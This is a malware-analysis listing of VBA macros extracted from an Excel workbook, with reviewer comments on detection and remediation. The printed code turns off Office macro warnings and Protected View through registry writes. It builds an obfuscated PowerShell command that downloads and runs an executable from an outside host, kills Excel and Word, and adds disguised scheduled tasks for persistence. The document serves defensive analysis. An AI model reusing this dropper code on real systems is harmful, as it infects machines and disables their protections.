      ' Defence weakening: the RegWrite calls below set, for Word, PowerPoint and
      ' Excel under Office 11.0, 12.0, 14.0, 15.0 and 16.0, Security\VBAWarnings = 1
      ' (the "enable all macros" level) and the three Security\ProtectedView
      ' Disable*InPV values = 1 (Protected View off for internet files, attachments
      ' and unsafe locations). All keys are under HKCU, so no elevation is needed,
      ' and the settings persist after this workbook is closed.
      ' NOTE(review): the sample spells one value name "DisableAttachementsInPV";
      ' match that literal spelling in detections, and check it against the Office
      ' documentation before assuming the write takes effect.
      ' Detection / remediation: alert on writes to these value names by an Office
      ' process or wscript/cscript, and reset them (or enforce them by policy) when
      ' cleaning an affected profile.
  386. Set wso = CreateObject("WScript.Shell")
  387. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  388. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  389. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  390. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  391. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  392. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  393. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  394. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  395. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  396. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  397. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  398. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  399. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  400. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  401. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  402. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  403. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  404. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  405. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  406. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  407. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  408. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  409. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  410. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  411. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  412. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  413. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  414. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  415. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  416. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  417. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  418. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  419. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  420. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  421. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  422. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  423. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  424. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  425. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  426. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  427. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  428. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  429. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  430. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  431. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  432. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  433. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  434. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  435. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  436. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  437. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  438. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  439. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  440. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  441. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  442. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  443. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  444. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  445. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  446. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  447.  
  448.  
  449.  
  450. End Sub
  451.  
  452.  
  453. -------------------------------------------------------------------------------
  454. VBA MACRO Sheet1.cls
  455. in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
  456. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  457. (empty macro)
  458. -------------------------------------------------------------------------------
  459. VBA MACRO Module1.bas
  460. in file: xl/vbaProject.bin - OLE stream: 'VBA/Module1'
  461. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  462. Sub duckyou()
      ' Empty procedure: there are no statements between Sub and End Sub, and nothing
      ' in the visible part of this listing calls it.
  463.  
  464. End Sub
  465.  
  466.  
  467.  
  468.  
  469. '################################### Second Stage ####################################
      ' NOTE(review): presumably the content of the 19.vbs script that the
      ' Workbook_Open macro downloads - the listing does not say so explicitly;
      ' confirm against the linked analysis.
      ' The fourteen fragments below are joined into one command and run with a hidden
      ' window (vbHide). Joined, the command reads:
      '   PowerShell (New-Object System.Net.WebClient).DownloadFile(
      '     'hxxp://onedrivenet[.]xyz/work/exe/20.exe','%Public%\svchost32.exe');
      '     Start-Process '%Public%\svchost32.exe'          (URL defanged here)
      ' i.e. it fetches an executable, stores it in the Public profile folder under a
      ' name resembling a Windows system process, and starts it.
      ' Detection: wscript/cscript spawning powershell.exe with DownloadFile on the
      ' command line; svchost32.exe created or executed outside the Windows directory.
  470. set AlWhaWu8AmxahJAs = CreateObject("WScript.Shell")
  471.    Dim Al89AwnAmxahJAs1
  472.    Dim Al89AwnAmxahJAs2
  473.    Dim Al89AwnAmxahJAs3
  474.    Dim Al89AwnAmxahJAs4
  475.    Dim Al89AwnAmxahJAs5
  476.    Dim Al89AwnAmxahJAs6
  477.    Dim Al89AwnAmxahJAs7
  478.    Dim Al89AwnAmxahJAs8
  479.    Dim Al89AwnAmxahJAs9
  480.    Dim Al89AwnAmxahJAs010
  481.    Dim Al89AwnAmxahJAs011
  482.    Dim Al89AwnAmxahJAs012
  483.    Dim Al89AwnAmxahJAs013
  484.    Dim Al89AwnAmxahJAs014
  485.  
  486.  
  487.    
  488. Al89AwnAmxahJAs1 = "PowerShel"
  489. Al89AwnAmxahJAs2 = "l (New-Ob"
  490. Al89AwnAmxahJAs3 = "ject Syst"
  491. Al89AwnAmxahJAs4 = "em.Net.We"
  492. Al89AwnAmxahJAs5 = "bClient)."
  493. Al89AwnAmxahJAs6 = "DownloadF"
  494. Al89AwnAmxahJAs7 = "ile('http://onedrivenet.xyz/work/exe/20.exe',"
  495. Al89AwnAmxahJAs8 = "'%Public%\s"
  496. Al89AwnAmxahJAs9 = "vchost32."
  497. Al89AwnAmxahJAs010 = "exe');S"
  498. Al89AwnAmxahJAs011 = "tart-Pr"
  499. Al89AwnAmxahJAs012 = "ocess '%"
  500. Al89AwnAmxahJAs013 = "Public%\sv"
  501. Al89AwnAmxahJAs014 = "chost32.exe'"
  502.  
  503.  
  504.    
  505. Al89AwnAmxahJAs20 = Al89AwnAmxahJAs1 + Al89AwnAmxahJAs2 + Al89AwnAmxahJAs3 + Al89AwnAmxahJAs4 + Al89AwnAmxahJAs5 + Al89AwnAmxahJAs6 + Al89AwnAmxahJAs7 + Al89AwnAmxahJAs8 + Al89AwnAmxahJAs9 + Al89AwnAmxahJAs010 + Al89AwnAmxahJAs011 + Al89AwnAmxahJAs012 + Al89AwnAmxahJAs013 + Al89AwnAmxahJAs014
  506.  
  507.  
  508.     AlWhaWu8AmxahJAs.run Al89AwnAmxahJAs20, vbHide
  509.  
  510. set tskkill = CreateObject("WScript.Shell")
      ' Force-terminates every Excel.exe process (taskkill /f /im), launched through a
      ' hidden PowerShell window. The user loses the open workbook without a prompt.
      ' Detection: taskkill targeting an Office process with a script host or
      ' PowerShell as parent.
  511.    Dim STArTkwZkill
  512.     STArTkwZkill = "Powershell -WindowStyle Hidden taskkill /f /im Excel.exe"
  513.  
  514. tskkill.run STArTkwZkill, vbHide
  515.  
  516.  
  517.  
  518. set Machuda2 = CreateObject("WScript.Shell")
      ' Persistence: creates (/F, without prompting) a scheduled task named
      ' WindowsUpdates that runs svchost32.vbs from the Public profile folder every
      ' 200 minutes. VBScript does not treat "\" as an escape character, so the task
      ' action contains the doubled backslashes literally - match on that form when
      ' hunting for this task.
  519.    Dim STArTkwZtime
  520.     STArTkwZtime = "SchTasks /Create /sc MINUTE /MO 200 /TN WindowsUpdates /TR C:\\Users\\Public\\svchost32.vbs /F"
  521.  
  522. Machuda2.run STArTkwZtime, vbHide
  523.  
  524.  
  525. set Machuda22 = CreateObject("WScript.Shell")
      ' Persistence: a second scheduled task, WindowsUpdates2, with the same
      ' 200-minute interval, pointing at svchost325.vbs in the Public profile folder.
      ' The task name imitates a Windows component; inventory tasks whose action is a
      ' script under C:\Users\Public when triaging a host.
  526.    Dim STArTkwZ2time
  527.     STArTkwZ2time = "SchTasks /Create /sc MINUTE /MO 200 /TN WindowsUpdates2 /TR C:\\Users\\Public\\svchost325.vbs /F"
  528.  
  529. Machuda22.run STArTkwZ2time, vbHide
  530.  
  531.  
  532.  
  533. set HOalwu = CreateObject("WScript.Shell")
      ' Removes the scheduled task named WindowsUpdate (singular) without prompting.
      ' That is the name of the one-minute task created by the Workbook_Open macro
      ' earlier in this listing, so once this script has run only the 200-minute
      ' WindowsUpdates / WindowsUpdates2 tasks remain. Task-creation and
      ' task-deletion events within a short window are a useful correlation point.
  534.    Dim AmwQ2
  535.     AmwQ2 = "schtasks /delete /tn WindowsUpdate /F"
  536.  
  537.  
  538. HOalwu.run AmwQ2, vbHide
  539.  
  540.  
  541.  
  ' Defense weakening: writes per-user (HKCU) Office security values for Word,
  ' PowerPoint and Excel under the version keys 11.0, 12.0, 14.0, 15.0 and 16.0.
  ' HKCU writes need no elevation, so this succeeds in a standard user context.
  ' Mitigation: enforce macro and Protected View settings through Group Policy
  ' (HKCU\Software\Policies\Microsoft\Office\<version>\<app>\Security), which
  ' takes precedence over the user-preference keys written here.
  ' Detection: alert on writes to ...\Security\VBAWarnings and
  ' ...\Security\ProtectedView\* made by an Office application or a script host.
  542. Set wso = CreateObject("WScript.Shell")
  ' VBAWarnings = 1 corresponds to the Trust Center choice "Enable all macros",
  ' so later documents run macros without a prompt.
  543. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  544. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  545. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  546. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  547. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  548. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  549. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  550. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  551. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  552. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  553. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  554. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  555. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  556. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  557. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  ' Protected View: the Disable*InPV values set to 1 switch Protected View off
  ' for internet-zone files, attachments and unsafe locations respectively.
  ' NOTE(review): the sample spells the attachment value "DisableAttachementsInPV";
  ' the documented Office value name is DisableAttachmentsInPV, so confirm on a
  ' test host whether those writes change anything. The misspelled name is a
  ' distinctive string for registry hunting.
  558. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  559. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  560. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  561. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  562. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  563. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  564. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  565. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  566. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  567. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  568. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  569. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  570. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  571. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  572. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  573. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  574. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  575. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  576. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  577. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  578. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  579. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  580. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  581. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  582. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  583. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  584. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  585. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  586. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  587. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  588. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  589. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  590. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  591. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  592. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  593. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  594. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  595. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  596. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  597. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  598. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  599. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  600. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  601. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  602. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  603.  
  ' Force-terminates every winword.exe process: taskkill /f /im is invoked
  ' through PowerShell with -WindowStyle Hidden, and the launcher itself is run
  ' with vbHide, so nothing is shown to the user.
  ' NOTE(review): the page header says the macro came out of an RTF file, so this
  ' presumably closes the Word instance that opened the lure. The visible lines
  ' do not confirm that.
  ' Hunting: powershell.exe whose command line contains "taskkill" and
  ' "winword.exe", started by an Office application or script host.
  604. set tskkillword = CreateObject("WScript.Shell")
  605.    Dim STArTkwZkillword
  606.     STArTkwZkillword = "Powershell -WindowStyle Hidden taskkill /f /im winword.exe"
  607.  
  608. tskkillword.run STArTkwZkillword, vbHide